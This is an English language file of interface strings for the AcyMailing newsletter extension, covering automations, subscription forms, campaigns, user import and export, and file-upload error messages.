ACYM_CREATE_ACY_USER_FOR_CMS_USER="Create a user on site account creation"
ACYM_XX_INTEGRATION="%s integration"
ACYM_ICON_IMPORTED="The icon has been successfully imported"
ACYM_SELECT_NEW_ICON="Select a new icon"
ACYM_CUSTOM_SOCIAL_ICONS="Social icons"
ACYM_AUTOSAVE_USE="AcyMailing found recent unsaved modifications, do you want to use them?"
ACYM_BOUNCE_WRONG_PORT="Are you sure you selected the right port? You can leave it empty if you do not know what to specify"
ACYM_NO_SUBSCRIPTION_LINKED_EMAIL="No subscription linked to this email"
ACYM_EMAIL_NOT_FOUND="Email not found"
ACYM_SPECIAL_CONTENT_WARNING="Special content like shortcodes, widgets and embeds are not displayed in the inserted content."
ACYM_CONTENT="Content"
ACYM_PAGE="Page"
ACYM_ARTICLE="Article"
ACYM_SET_ACTIONS_TARGETS="Set action targets"
ACYM_NUMBER_USERS_LIST="Number of users per list"
ACYM_TOSS="Toss"
ACYM_TOSS_DESC="The automation will have a one-in-two chance of being executed"
ACYM_ACYMAILING_USERS="AcyMailing users"
ACYM_EXACTLY="Exactly"
ACYM_THERE_IS="There is"
ACYM_NUMBER_OF_USERS="Number of users"
ACYM_FORMAT="Format"
ACYM_SEND_MAILS_MANUALLY="Send mails manually"
ACYM_MAIL_FROM_AUTOMATION_SENT_TO="Mail from automation will be sent to: "
ACYM_MAILS="Mails"
ACYM_BEFORE_DATE="%s in the past"
ACYM_AFTER_DATE="%s in the future"
ACYM_CONDITION_PURCHASED="Bought %1$s in %2$s"
ACYM_CONDITION_ECOMMERCE_REMINDER="Created an order with %1$s %2$s day(s) ago and status is %3$s"
ACYM_SELECT_TARGETS_ACTIONS="Select the targets of your actions"
ACYM_ACTIONS_TARGETS="Actions targets"
ACYM_YOU_DID_NOT_SET_CONDITION="You didn't set any condition for this automation"
ACYM_PLEASE_SET_CONDITION_OR_SAVE="Please set a <b>condition</b> or click on <b>save & continue</b> if you don't want conditions"
ACYM_CONDITION_ACY_CMS_FIELD_SUMMARY="Has his account field %1$s %2$s %3$s"
ACYM_IS_SUBSCRIBED="Is subscribed"
ACYM_IS_UNSUBSCRIBED="Is unsubscribed"
ACYM_IS_NOT_SUBSCRIBED="Is not subscribed"
ACYM_CONDITION_ACY_LIST_SUMMARY=" %1$s to the list %2$s"
ACYM_CONDITION_ACY_FIELD_SUMMARY="Has the field %1$s %2$s %3$s"
ACYM_ONE_ACYMAILING_USER_CONDITION="the user"
ACYM_CONDITIONS_APPLY_TO="This automation will be executed if %s"
ACYM_ADD_CONDITION="Add condition"
ACYM_SELECT_CONDITION="Select condition"
ACYM_EXECUTE_CONDITIONS_ON_ALL_USERS="Execute conditions on all users"
ACYM_EXECUTE_CONDITIONS_ON_ONE_USERS="Execute conditions on the user triggering the automation"
ACYM_SELECT_YOUR_CONDITIONS="Select your conditions"
ACYM_CONDITIONS="Conditions"
ACYM_BOUGHT="Bought"
ACYM_AT_LEAST_ONE_PRODUCT="At least one product"
ACYM_ANY_CATEGORY="Any category"
ACYM_ANY_PAYMENT_METHOD="Any payment method"
ACYM_PURCHASED="Purchased a product"
ACYM_ORDER_WITH_STATUS="Placed an order %1$s days ago and the order status is currently %2$s"
ACYM_REMINDER="Reminder"
ACYM_COMBINED_TRANSLATIONS="%1$s - %2$s"
ACYM_CHOOSE_COLUMN="Choose a column"
ACYM_REDO_MIGRATION="V5 data migration"
ACYM_DISPLAY_GIF="Here are some gifs to wait"
ACYM_FRONT_ARCHIVE_NOT_CONNECTED="You are not connected. The newsletter may include some user information, so they may not be displayed correctly."
ACYM_NUMBER_CAMPAIGNS_TO_DISPLAY="Number of campaigns to display"
ACYM_ZERO_ALL="Keep 0 if you want to display all campaigns"
ACYM_CLEAR="Clear"
ACYM_ACCEPT_TERMS="Please check the Terms and Conditions / Privacy policy"
ACYM_I_AGREE_BOTH="I agree with the %1$s and the %2$s"
ACYM_I_AGREE_TERMS="I agree with the %s"
ACYM_I_AGREE_PRIVACY="I agree with the %s"
ACYM_SELECT_AN_ARTICLE="Select an article"
ACYM_TERMS_CONDITIONS="Terms and conditions"
ACYM_PRIVACY_POLICY="Privacy policy"
ACYM_DISPLAY_ARTICLE_POPUP="Display the article(s) in a popup"
ACYM_FORM_CLASS="Form CSS class"
ACYM_FORM_CLASS_DESC="A CSS class added to the subscription form. This allows individual form styling"
ACYM_ALIGNMENT_DESC="This option enables you to align the text inside the subscription form"
ACYM_RIGHT="Right"
ACYM_LEFT="Left"
ACYM_CENTER="Centre"
ACYM_SUBSCRIBE_TEXT_LOGGED_IN="Subscribe button text for logged in users"
ACYM_SUBSCRIBE_TEXT_LOGGED_IN_DESC="Text displayed on the subscribe button when the user is logged in"
ACYM_LIST_POSITION="Display the lists"
ACYM_BEFORE_FIELDS="Before the fields"
ACYM_AFTER_FIELDS="After the fields"
ACYM_REDIRECT_LINK_UNSUB="Redirection after unsubscribing"
ACYM_REDIRECT_LINK_UNSUB_DESC="The user will be redirected to this URL after clicking the unsubscribe button"
ACYM_DISCOUNT_CODE="Discount code"
ACYM_DETAILS="Details"
ACYM_CATEGORIES="Categories"
ACYM_SHORT_DESCRIPTION="Short description"
ACYM_OVERWRITE_EXISTING="Overwrite existing user's information"
ACYM_EXCEL_SECURITY="Excel security"
ACYM_EXCEL_SECURITY_DESC="If this option is active, values starting with a =, +, - or @ will be prefixed by a tab to avoid any CSV injection when opening the exported file with Excel.<br />Make sure the tab is automatically removed or turn Off this option if you import the file somewhere else than AcyMailing"
ACYM_WARNING_STYLESHEET_NOT_CORRECT="Some CSS code is not compatible with all the editors, prefer using th.your_class rather than th[class=&quot;your_class&quot;]"
ACYM_ERROR_COPYING_FOLDER_TO="Error copying folder from %1$s to %2$s"
ACYM_BROWSE_FILE="Can't find file"
ACYM_SENT_WITH_AUTOMATION="Sent with automation"
ACYM_AUTOMATED_TASKS="Automated tasks"
ACYM_DAILY_TASKS="Execute daily tasks at %1$s : %2$s"
ACYM_TEMPLATE_THUMBNAIL_IMPORT="if you want a thumbnail in the listing"
ACYM_TEMPLATE_IMAGES_IMPORT="all your images"
ACYM_TEMPLATE_CSS_IMPORT="your CSS files (*.css)"
ACYM_TEMPLATE_HTML_IMPORT="your html code"
ACYM_TEMLPATE_ZIP_IMPORT="template.zip"
ACYM_IMPORT_INFO="If you want to import your template please upload a zip with this structure: "
ACYM_ERROR="An error occurred"
ACYM_UNKNOWN_OPERATOR="Unknown operator: %s"
ACYM_SELECT_ACTIONS="Please select actions"
ACYM_SELECT_FILTERS="Please select filters"
ACYM_MARGIN_TOP_CONTENT="Content top margin"
ACYM_SELECT_A_LIST="Select a list"
ACYM_PLEASE_SET_ACTIONS="Please set at least one action"
ACYM_WHEN_USER_SUBSCRIBES="When the user subscribes"
ACYM_CREATE_MAIL="Create new mail"
ACYM_VIEW_ALL_AUTOMATIONS="View all automations"
ACYM_DATE_AUTOMATION_INPUT="Please format the date like 21/12/2010 your format is %s"
ACYM_ACTION_LIST_SUB="%s users subscribed"
ACYM_ACTION_LIST_REMOVE="%s user subscriptions removed"
ACYM_ACTION_LIST_UNSUB="%s users unsubscribed"
ACYM_AUTOMATION_NOT_FOUND="Automation not found"
ACYM_EMAILS_REMOVED_QUEUE="%s emails removed from the queue"
ACYM_EMAILS_ADDED_QUEUE="%s emails added to the queue"
ACYM_UPDATED_USERS="%s users updated"
ACYM_ACTION_DELETE="deleted"
ACYM_ACTION_ACTIVE="activated"
ACYM_ACTION_BLOCK="blocked"
ACYM_ACTION_UNCONFIRM="unconfirmed"
ACYM_ACTION_CONFIRM="confirmed"
ACYM_X_USERS_X="%1$s users %2$s"
ACYM_NOT_SUBSCRIBED="not subscribed"
ACYM_MASS_ACTION="Mass action"
ACYM_REMOVE_FROM="removed from"
ACYM_SUBSCRIBED_TO="subscribed to"
ACYM_UNSUBSCRIBE_FROM="unsubscribed from"
ACYM_ACTION_LIST_SUMMARY="Will be %1$s the list %2$s"
ACYM_ACTION_REMOVE_QUEUE_SUMMARY="Will not receive the mail %s"
ACYM_ACTION_ADD_QUEUE_SUMMARY="Will receive the mail %1$s on the %2$s"
ACYM_ACTION_USER_VALUE_SUMMARY="Will have the field %1$s %2$s %3$s"
ACYM_WILL_DELETE="Will be deleted"
ACYM_WILL_BLOCK="Will be blocked"
ACYM_WILL_ACTIVE="Will be activated"
ACYM_WILL_UNCONFIRM="Will be unconfirmed"
ACYM_WILL_CONFIRM="Will be confirmed"
ACYM_ACTIONS_USER_WILL="The users selected by this %s "
ACYM_FILTER_ACY_CMS_FIELD_SUMMARY="With the account field %1$s %2$s %3$s"
ACYM_FILTER_ACY_GROUP_SUBGROUP_SUMMARY="including sub groups"
ACYM_FILTER_ACY_GROUP_SUMMARY=" %1$s the group %2$s"
ACYM_WHERE_DATE_MAX_ACY_LIST_SUMMARY=" is lower than %s"
ACYM_WHERE_DATE_MIN_ACY_LIST_SUMMARY=" is higher than %s"
ACYM_WHERE_DATE_ACY_LIST_SUMMARY=" where the %1$s"
ACYM_FILTER_ACY_LIST_SUMMARY=" %1$s to the list %2$s"
ACYM_ONE_ACYMAILING_USER="one AcyMailing user"
ACYM_ALL_ACYMAILING_USERS="all AcyMailing users"
ACYM_FILTERS_APPLY_TO="This %1$s will be applied to %2$s"
ACYM_FILTER_ACY_FIELD_SUMMARY="With the field %1$s %2$s %3$s"
ACYM_TRIGGERS="Triggers"
ACYM_AUTOMATION_TRIGGER="The automation will be triggered:"
ACYM_TRIGGER_EVERY_SUMMARY="Every %1$s %2$s"
ACYM_TRIGGER_ON_DAY_MONTH_SUMMARY="On the %1$s %2$s of each month"
ACYM_TRIGGER_WEEKS_ON_SUMMARY="Every weeks on %s"
ACYM_TRIGGER_DAY_SUMMARY="Every day at %1$s:%2$s"
ACYM_SELECTED_USERS_TOTAL="Total: <b>%s</b> AcyMailing users match these conditions"
ACYM_SELECTED_USERS="<b>%s</b> AcyMailing users match this condition"
ACYM_BEGINS_WITH="Begins with"
ACYM_ENDS_WITH="Ends with"
ACYM_CONTAINS="Contains"
ACYM_NOT_CONTAINS="Does not contain"
ACYM_NAME_SUMMARY="Name"
ACYM_ACTIVE_AUTOMATION="Active automation"
ACYM_PROCESS_MASS_ACTION="Process mass action"
ACYM_EVERY="Every"
ACYM_ONTHE="On the"
ACYM_FIRST="First"
ACYM_SECOND="Second"
ACYM_THIRD="Third"
ACYM_LAST="Last"
ACYM_DAYOFMONTH="of the month"
ACYM_AFTER="After"
ACYM_BEFORE="Before"
ACYM_HOUR="Hour"
ACYM_SPECIFIC_DATE="Specific date"
ACYM_RELATIVE_DATE="Relative date"
ACYM_ADD_AT_BEGINNING="Add at the beginning"
ACYM_ADD_AT_END="Add at the end"
ACYM_ACTIVE_USER="Activate user"
ACYM_UNCONFIRM_USER="Unconfirm user"
ACYM_CONFIRM_USER="Confirm user subscription"
ACYM_REMOVE_EMAIL_QUEUE="Remove an email from the queue"
ACYM_ADD_EMAIL_QUEUE="Add an email to the queue"
ACYM_SET_USER_VALUE="Set user value"
ACYM_ACTION_ON_USERS="Action on user"
ACYM_UNSUBSCRIBE_USERS_TO="Unsubscribe users from"
ACYM_REMOVE_USERS_FROM="Remove users from"
ACYM_SUBSCRIBE_USERS_TO="Subscribe users to"
ACYM_IMPORT_SUBSCRIPTION="%s subscriptions have been inserted"
ACYM_LAST_CHECK="Last check:"
ACYM_ATTACH_LICENCE="This website is not assigned to any licence"
ACYM_SUBSCRIPTION_EXPIRED="Your licence has expired"
ACYM_SUBSCRIPTION_EXPIRED_LINK="Click to renew it!"
ACYM_VALID_UNTIL="Valid Until: %s"
ACYM_ADD_ACTION="Add action"
ACYM_SELECT_YOUR_ACTIONS="Select the actions"
ACYM_EVERY_DAY_AT="Every day at"
ACYM_EVERY_WEEK_ON="Every week on"
ACYM_PLEASE_SELECT_ONE_TRIGGER="Please select at least one trigger"
ACYM_UNSUBSCRIPTION_DATE="Unsubscription date"
ACYM_IN="In"
ACYM_NOT_IN="Not in"
ACYM_INCLUDE_SUB_GROUPS="Include sub-groups"
ACYM_ACCOUNT_USER_FIELD="Site account user field"
ACYM_GROUP="Group"
ACYM_EXECUTE_ACTIONS_ON_ONE_USERS="Execute actions on the user triggering the automation"
ACYM_EXECUTE_ACTIONS_ON_ALL_USERS="Execute actions on all users"
ACYM_AND="And"
ACYM_ACYMAILING_FIELD="AcyMailing field"
ACYM_OR="Or"
ACYM_ADD_FILTER="Add filter"
ACYM_NO_SUBSCRIPTION_STATUS="No subscription status"
ACYM_ACYMAILING_LIST="AcyMailing list"
ACYM_SELECT_FILTER="Select filter"
ACYM_NEW_AUTOMATION="New automation"
ACYM_NEW_MASS_ACTION="New mass actions"
ACYM_ACTIONS="Actions"
ACYM_THURSDAY="Thursday"
ACYM_WHEN_USER_OPEN_MAIL="When a user opens an email"
ACYM_WHEN_USER_CLICKS_MAIL="When a user clicks on a link in an email"
ACYM_ON_USER_MODIFICATION="On user modification"
ACYM_ON_USER_CREATION="On user creation"
ACYM_ALL_TRIGGER="All triggers"
ACYM_DRAG_YOUR_TRIGGERS="Drag the triggers here"
ACYM_INFORMATION="Information"
ACYM_CLASSIC_TRIGGER="Classic trigger"
ACYM_TRIGGER_BASED_ON_USER_ACTIONS="Trigger based on user actions"
ACYM_DESCRIPTION="Description"
ACYM_NEW="New"
ACYM_NO_JAVASCRIPT="Please enable the javascript to submit this form"
ACYM_DEFAULT_REQUIRED_MESSAGE="Please fill in the field %s"
ACYM_PLEASE_CONFIRM_SUBSCRIPTION="Please confirm your subscription"
ACYM_CONFIRM_MESSAGE="You've subscribed to our newsletters from our website"
ACYM_CONFIRM_MESSAGE_ACTIVATE="We need you to activate your subscription by clicking the link below:"
ACYM_ERROR_UPLOADING_FILE_X="Error Uploading file: %s"
ACYM_COULD_NOT_COPY_FILE_X_TO_X="Could not copy the file %1$s to %2$s"
ACYM_COULD_NOT_UPLOAD_FILE_PERMISSION="Couldn't upload file, check permissions for the folder %s"
ACYM_FILE_REJECTED_SAFETY_REASON="The file has been rejected for safety reason"
ACYM_COULD_NOT_MOVE_FILE="Could not move the file"
ACYM_COULD_NOT_FIND_FILE_SOURCE_PERMISSION="Could not find source file, check permissions: %s"
ACYM_FAILED_DELETE="Failed to delete %s"
ACYM_COPY_FILE_FAILED_PERMISSION="Copy file %s failed, check permissions"
ACYM_CANNOT_OPEN_SOURCE_FOLDER="Cannot open source folder"
ACYM_CANNOT_CREATE_DESTINATION_FOLDER="Cannot create destination folder"
ACYM_FOLDER_ALREADY_EXIST="Folder %s already exists"
ACYM_FOLDER_DOES_NOT_EXIST="Folder %s does not exist"
ACYM_IS_NOT_A_FOLDER="%s is not a folder"
ACYM_IS_NOT_A_FILE="%s is not a file"
ACYM_COULD_NOT_DELETE_FOLDER="Could not delete folder %s"
ACYM_FILE_UPLOAD_ERROR_1="The uploaded file exceeds the upload_max_filesize directive in php configuration."
ACYM_FILE_UPLOAD_ERROR_2="The uploaded file exceeds the MAX_FILE_SIZE directive that was specified in the HTML form."
ACYM_FILE_UPLOAD_ERROR_3="The uploaded file was only partially uploaded."
ACYM_FILE_UPLOAD_ERROR_4="No file was uploaded."
ACYM_FILE_UPLOAD_ERROR_5="Error uploading the file on the server, unknown error %s."
ACYM_FILE_UPLOAD_ERROR_6="Can not upload the file, please make sure file_uploads is enabled on your php.ini file."
ACYM_FILE_UPLOAD_ERROR_7="Error uploading the file from %1$s to %2$s"
ACYM_FILE_UPLOAD_ERROR_8="File %s deleted from the template pack."
ACYM_FILE_UPLOAD_ERROR_9="Error extracting the file %1$s to %2$s."
ACYM_FILE_UPLOAD_ERROR_10="Error installing template."
ACYM_TEMPLATES_INSTALL="%s Templates Installed"
ACYM_JPAGETITLE="%1$s - %2$s"
ACYM_UP_TO_DATE="You are up to date"
ACYM_EXPORT_BOTH="Export both"
ACYM_USER_CMSID="User account ID"
ACYM_USER_ACTIVE="User active status"
ACYM_ACTIVE="Active"
ACYM_APRIL="April"
ACYM_AUGUST="August"
ACYM_ADD_TAGS="Add tags"
ACYM_ALL="All"
ACYM_ALL_TAGS="All tags"
ACYM_AUTOMATION="Automation"
ACYM_BOUNCE_EMAIL="Bounce email address"
ACYM_BOUNCE_EMAIL_PLACEHOLDER="no-reply@example.com"
ACYM_CAMPAIGN="Campaign"
ACYM_CAMPAIGNS="Campaigns"
ACYM_CANCEL="Cancel"
ACYM_CANCEL_SCHEDULING="Cancel Scheduling"
ACYM_CAPTCHA_INVISIBLE="Invisible reCaptcha"
ACYM_CHECK_DB="Check database integrity"
ACYM_CLICK="Click"
ACYM_COLOR="Colour"
ACYM_COMMA="Comma (,)"
ACYM_CONFIGURATION="Configuration"
ACYM_CONFIGURATION_ADVANCED="Advanced configuration"
ACYM_CONFIGURATION_CAPTCHA="Captcha"
ACYM_CONFIGURATION_CHARSET="Charset"
ACYM_CONFIGURATION_DB_MAINTENANCE="Database maintenance"
ACYM_CONFIGURATION_DKIM="DKIM"
ACYM_CONFIGURATION_EMBED_ATTACHMENTS="Embed attachments"
ACYM_CONFIGURATION_EMBED_IMAGES="Embed images"
ACYM_CONFIGURATION_ENCODING="Encoding format"
ACYM_CONFIGURATION_HTTPS="Use https"
ACYM_CONFIGURATION_QUEUE="Queue process"
ACYM_CONFIGURATION_QUEUE_AUTOMATIC="Automatic only"
ACYM_CONFIGURATION_QUEUE_AUTOMAN="Automatic / Manual"
ACYM_CONFIGURATION_QUEUE_MANUAL="Manual only"
ACYM_CONFIGURATION_QUEUE_PROCESSING="Queue processing"
ACYM_CONFIGURATION_LANGUAGES="Languages"
ACYM_CONFIGURATION_MAIL="Mail settings"
ACYM_CONFIGURATION_MAIL_DESCRIPTION="How do you want to send your emails?"
ACYM_CONFIGURATION_MULTIPART="Multiple parts"
ACYM_CONFIGURATION_SECURITY="Security"
ACYM_CONFIGURATION_SUBSCRIPTION="Subscription"
ACYM_CONFIRMED="Confirmed"
ACYM_CREATE_NEW_LIST="Create new list"
ACYM_CREATE_SEGMENT="Create segment"
ACYM_CREATE_TEMPLATE="Create new template"
ACYM_CREATE_AUTOMATION="Create automation"
ACYM_DASHBOARD="Dashboard"
ACYM_DATE_CREATED="Creation date"
ACYM_DECEMBER="December"
ACYM_DEFAULT_SENDER="Default sender information"
ACYM_DELETE="Delete"
ACYM_DELETE_USER="Delete user"
ACYM_DRAFT="Draft"
ACYM_EMAIL="Email"
ACYM_ERROR_SAVING="Error saving"
ACYM_EXPORT="Export"
ACYM_EXPORT_USERS="Export users"
ACYM_FAIL_SAVE_FILE="Couldn't save the file %s"
ACYM_FEBRUARY="February"
ACYM_FRIDAY="Friday"
ACYM_FROM_AS_REPLYTO="Use same settings for REPLY-TO"
ACYM_FROM_EMAIL="From email"
ACYM_FROM_EMAIL_PLACEHOLDER="sender@example.com"
ACYM_FROM_NAME="From name"
ACYM_FROM_NAME_PLACEHOLDER="Company name, your name etc."
ACYM_IMPORT_USERS="Import users"
ACYM_INACTIVE="Inactive"
ACYM_JANUARY="January"
ACYM_JULY="July"
ACYM_JUNE="June"
ACYM_LIBRARY="Library"
ACYM_LIST="List"
ACYM_LISTS="Lists"
ACYM_LIST_DOESNT_EXIST="The list doesn't exist"
ACYM_LIST_ID="List ID"
ACYM_LIST_IS_SAVED="The list %s is saved"
ACYM_LIST_NAME="List name"
ACYM_MARCH="March"
ACYM_MAY="May"
ACYM_MONDAY="Monday"
ACYM_NAME="Name"
ACYM_NO="No"
ACYM_NO_LIST_SELECTED="No list selected"
ACYM_NOT_ALLOWED_FIELDS="The field(s) %1$s are not in the allowed fields: %2$s"
ACYM_NOVEMBER="November"
ACYM_OCTOBER="October"
ACYM_OPEN="Open"
ACYM_RECIPIENTS="Recipients"
ACYM_REPLYTO_EMAIL="Reply-to email"
ACYM_REPLYTO_EMAIL_PLACEHOLDER="contact@example.com"
ACYM_REPLYTO_NAME="Reply-to name"
ACYM_REPLYTO_NAME_PLACEHOLDER="Company name, your name etc."
ACYM_SAVE_CONTINUE="Save & continue"
ACYM_SAVE_EXIT="Save & exit"
ACYM_SCHEDULED="Scheduled"
ACYM_SEARCH="Search..."
ACYM_SEMICOLON="Semicolon (;)"
ACYM_SENDING="Sending"
ACYM_SENT="Sent"
ACYM_SEPTEMBER="September"
ACYM_SMTP="SMTP Server"
ACYM_SORT_BY="Sort by:"
ACYM_STATISTICS="Statistics"
ACYM_STATUS="Status"
ACYM_SUBSCRIBERS="Subscribers"
ACYM_SUBSCRIPTION_DATE="Subscription date"
ACYM_SUCCESSFULLY_SAVED="Successfully saved"
ACYM_TAGS="Tags"
ACYM_TEMPLATE_NAME="Template name"
ACYM_TEMPLATES="Templates"
ACYM_TUESDAY="Tuesday"
ACYM_SUBSCRIBED="Subscribed"
ACYM_SUBSCRIBE="Subscribe"
ACYM_UNSUBSCRIBE="Unsubscribe"
ACYM_UNSUBSCRIBED="Unsubscribed"
ACYM_USER="User"
ACYM_USERS="Users"
ACYM_YES="Yes"
ACYM_WELCOME_MAIL="Welcome email"
ACYM_UNSUBSCRIBE_MAIL="Unsubscribe email"
ACYM_OPTIONAL="Optional"
ACYM_CAMPAIGN_SENT_TO="Campaign will be sent to a total of:"
ACYM_CHOOSE_LISTS="Choose lists"
ACYM_SHOW_ALL_LISTS="Show all lists"
ACYM_SHOW_SELECTED_LISTS="Show only selected lists"
ACYM_NEW_LIST="New list"
ACYM_NEW_USER="New user"
ACYM_CREATE="Create"
ACYM_SATURDAY="Saturday"
ACYM_SUNDAY="Sunday"
ACYM_WEDNESDAY="Wednesday"
ACYM_CREATE_EMPTY_TEMPLATE="Create empty template"
ACYM_START_FROM="Start from"
ACYM_SENDING_DATE="Sending date"
ACYM_CAMPAIGN_CANT_BE_SAVED="The campaign couldn't be saved"
ACYM_TYPE="Type"
ACYM_ATTACHMENTS="Attachments"
ACYM_SEND_SETTINGS="Send settings"
ACYM_THIS_CAMPAIGN_WILL_BE_SENT="This campaign will be sent"
ACYM_SAVE_AS_DRAFT="Save as draft"
ACYM_CONFIRM_CAMPAIGN="Confirm campaign"
ACYM_NOW="Now"
ACYM_CAMPAIGN_SUCCESSFULLY_SAVE_AS_DRAFT="The campaign was successfully saved as draft"
ACYM_CANT_GET_CAMPAIGN_INFORMATION="The campaign information are not available"
ACYM_EDIT="Edit"
ACYM_EDIT_TEMPLATE="Edit template"
ACYM_CAMPAIGN_WILL_BE_SENT_TO_A_TOTAL_OF="Campaign will be sent to a total of %s recipients"
ACYM_THIS_CAMPAIGN_WILL_BE_SENT_ON_AT="This campaign will be sent on %1$s at %2$s"
ACYM_BACK="Back"
ACYM_NEW_CAMPAIGN="New campaign"
ACYM_MAIN_OPTIONS="Main options"
ACYM_TITLE="Title"
ACYM_DISPLAYED_LISTS="Displayed lists"
ACYM_AUTO_SUBSCRIBE_TO="Automatically subscribe to"
ACYM_TEXT_MODE="Display text mode"
ACYM_TEXT_INSIDE="Inside"
ACYM_TEXT_OUTSIDE="Outside"
ACYM_SUBSCRIBE_TEXT="Subscribe button text"
ACYM_UNSUBSCRIBE_TEXT="Unsubscribe button text"
ACYM_DISPLAY_MODE="Display mode"
ACYM_MODE_HORIZONTAL="Horizontal"
ACYM_MODE_VERTICAL="Vertical"
ACYM_MODE_TABLELESS="Tableless"
ACYM_ADVANCED_OPTIONS="Advanced options"
ACYM_DISPLAY_UNSUB_BUTTON="Unsubscribe button"
ACYM_INTRO_TEXT="Intro text"
ACYM_POST_TEXT="Post text"
ACYM_FORM_AUTOFILL_ID="Display user information if logged in"
ACYM_SOURCE="Source"
ACYM_REDIRECT_LINK="Redirect link"
ACYM_MISSING_NAME="Please enter your name"
ACYM_VALID_EMAIL="Please enter a valid e-mail address"
ACYM_WRONG_CAPTCHA="The captcha is invalid, please try again"
ACYM_SELECT_LIST="Please select the lists you want to subscribe to"
ACYM_SECURITY_KEY="Security key"
ACYM_LOGIN="Please log in"
ACYM_EMAIL_VERIFICATION="Advanced email verification"
ACYM_CHECK_DOMAIN_EXISTS="Check if the domain exists"
ACYM_ERROR_SAVE_USER="Could not save the user"
ACYM_CONFIRMATION_SENT="An e-mail has been sent to confirm your subscription"
ACYM_SUBSCRIPTION_OK="You have successfully subscribed"
ACYM_UNSUBSCRIPTION_OK="You have successfully unsubscribed"
ACYM_ALREADY_SUBSCRIBED="You are already subscribed"
ACYM_NOT_IN_LIST="The e-mail address %s is not in the list of users"
ACYM_UNSUBSCRIPTION_NOT_IN_LIST="You were not subscribed"
ACYM_SITE_KEY="Google site key"
ACYM_SECRET_KEY="Google secret key"
ACYM_HELP="Help"
ACYM_DISPLAYED_LISTS_DESC="The selected lists will be added on the subscription form to let the users opt-in (if they are not selected as automatically subscribed)."
ACYM_AUTO_SUBSCRIBE_TO_DESC="The user will be automatically subscribed to the selected lists. They won't be displayed on your subscription form."
ACYM_TEXT_MODE_DESC="Display the labels inside or outside the fields?"
ACYM_SUBSCRIBE_TEXT_DESC="Text displayed on the subscribe button. You can use a custom translation key for it (create it in the acym configuration page, tab Languages)"
ACYM_DISPLAY_MODE_DESC="Select whether you want to display the form horizontally, vertically or without table (recommended)"
ACYM_UNSUBSCRIBE_TEXT_DESC="Text displayed on the subscribe button. You can use a custom translation key for it (create it in the acym configuration page, tab Languages)"
ACYM_INTRO_TEXT_DESC="This text will be displayed before the subscription form inside a div with the class 'acym_introtext'"
ACYM_POST_TEXT_DESC="This text will be displayed after the subscription form inside a div with the class 'acym_posttext'"
ACYM_FORM_AUTOFILL_ID_DESC="Do you want the logged in users to be automatically identified in the module?"
ACYM_SOURCE_DESC="The source indicates from where your subscribers came from. You will be able to filter them afterwards based on if they came from a subscription form, an imported file, an account creation..."
ACYM_REDIRECT_LINK_DESC="The user will be redirected to this URL after subscribing. If no URL is specified, the form is refreshed using ajax."
ACYM_SAVE="Save"
ACYM_BACK_TO_LISTING="Back to listing"
ACYM_ENABLE="Enable"
ACYM_DISABLE="Disable"
ACYM_CHOOSE_ACTION="Choose an action"
ACYM_STOP_THE_SCHEDULING_AND_SET_CAMPAIGN_AS_DRAFT="Stop the scheduling and set campaign as draft"
ACYM_SENDER_INFORMATION="Sender information"
ACYM_BCC="BCC"
ACYM_WHEN_EMAIL_WILL_BE_SENT="When do you want your email to be sent?"
ACYM_SENT_AS_SOON_CAMPAIGN_SAVE="Your campaign will be sent as soon as you confirm it"
ACYM_CAMPAIGN_WILL_BE_SENT="This campaign will be sent at: "
ACYM_SUMMARY="Summary"
ACYM_FAMILY="Family"
ACYM_SIZE="Size"
ACYM_STYLE="Style"
ACYM_DESIGN="Design"
ACYM_BACKGROUND_COLOR="Background colour"
ACYM_BLOCKS="Blocks"
ACYM_CONTENTS="Contents"
ACYM_IMPORT="Import"
ACYM_CHOOSE_FILE_WITH_USER_DATA="Choose a <b>CSV</b> file with your user data"
ACYM_IMPORT_USER_FROM_FILE_INFORMATION_MESSAGE_BELOW_CHOOSE_FILE_BUTTON="Please make sure the contacts you import accepted to receive emails from you"
ACYM_PLEASE_BROWSE_FILE_IMPORT="Please browse for a file to import"
ACYM_FAIL_OPEN="Could not open the file %s"
ACYM_IGNORE="Ignore"
ACYM_IGNORE_UNASSIGNED="Ignore unassigned columns"
ACYM_CLICK_TO_EDIT="Click to edit"
ACYM_CONFIRM="Confirm"
ACYM_RESUBSCRIBE="re-subscribe"
ACYM_SORT_ASC="Ascending sort (click for descending sort)"
ACYM_SORT_DESC="Descending sort (click for ascending sort)"
ACYM_DATE_FORMAT_LC1="l, j F Y"
ACYM_DATE_FORMAT_LC2="l, j F Y H:i"
ACYM_FAIL_UPLOAD="Could not upload the file %1$s to %2$s"
ACYM_WRITABLE_FOLDER="Please make sure the folder ( %s ) is writable"
ACYM_UPLOADED_FILE_NOT_FOUND="Uploaded file not found:"
ACYM_COLUMNS_NOT_FOUND="Columns not found"
ACYM_IMPORT_HEADER="The first line of your file (%s) must contain only columns of the acym_user table"
ACYM_IMPORT_EMAIL="You need at least the column <b>email</b> <br /> Example: name,email"
ACYM_IMPORT_ARGUMENTS="You need %s arguments per line, one or more line(s) couldn't be imported"
ACYM_DOWNLOAD_IMPORT_ERRORS="Click here to download all lines containing errors"
ACYM_IMPORT_REPORT="<b>%1$s</b> users in the imported file: <br /> - <b>%2$s</b> new users <b>imported</b><br /> - <b>%3$s</b> <b>invalid</b> lines or email addresses<br /> - <b>%4$s</b> already <b>existing</b> users or <b>duplicate</b> entries"
ACYM_IMPORT_ERROR_FIELD="The column %1$s is not in the list of possible columns: %2$s"
ACYM_UPLOADED_FILE_EXCEED_MAX_FILESIZE_PHP="The uploaded file exceeds the upload_max_filesize directive in php configuration"
ACYM_FILE_UPLOADED_PARTIALLY="The uploaded file was only partially uploaded"
ACYM_NO_FILE_WAS_UPLOADED="No file was uploaded"
ACYM_UNKNOWN_ERROR_UPLOADING_FILE="Error uploading the file on the server, unknown error: %s"
ACYM_IMPORT_FROM_FILE="Import from file"
ACYM_IMPORT_FROM_TEXT="Import from text"
ACYM_IMPORT_UPDATE="%s AcyMailing users updated"
ACYM_IMPORT_DELETE="%s AcyMailing users deleted"
ACYM_IMPORT_NEW="%s new users imported"
ACYM_IMPORT_NB_WEBSITE_USERS="There are <b>%s</b> users on your website"
ACYM_IMPORT_NB_ACYM_USERS="There are <b>%s</b> registered users in AcyMailing"
ACYM_IMPORT_CMS_1="If you click on the 'import' button, the system will:"
ACYM_IMPORT_CMS_2="<b>Update</b> the AcyMailing users from your %s users"
ACYM_IMPORT_CMS_3="<b>Delete</b> the AcyMailing users if they were linked to a %s user that does not exist any more"
ACYM_IMPORT_CMS_4="<b>Add</b> all your %s users into AcyMailing if they are not already there"
ACYM_IMPORT_CMS_5="<b>Subscribe</b> all your %s users to the selected lists if they are not already subscribed or unsubscribed from it"
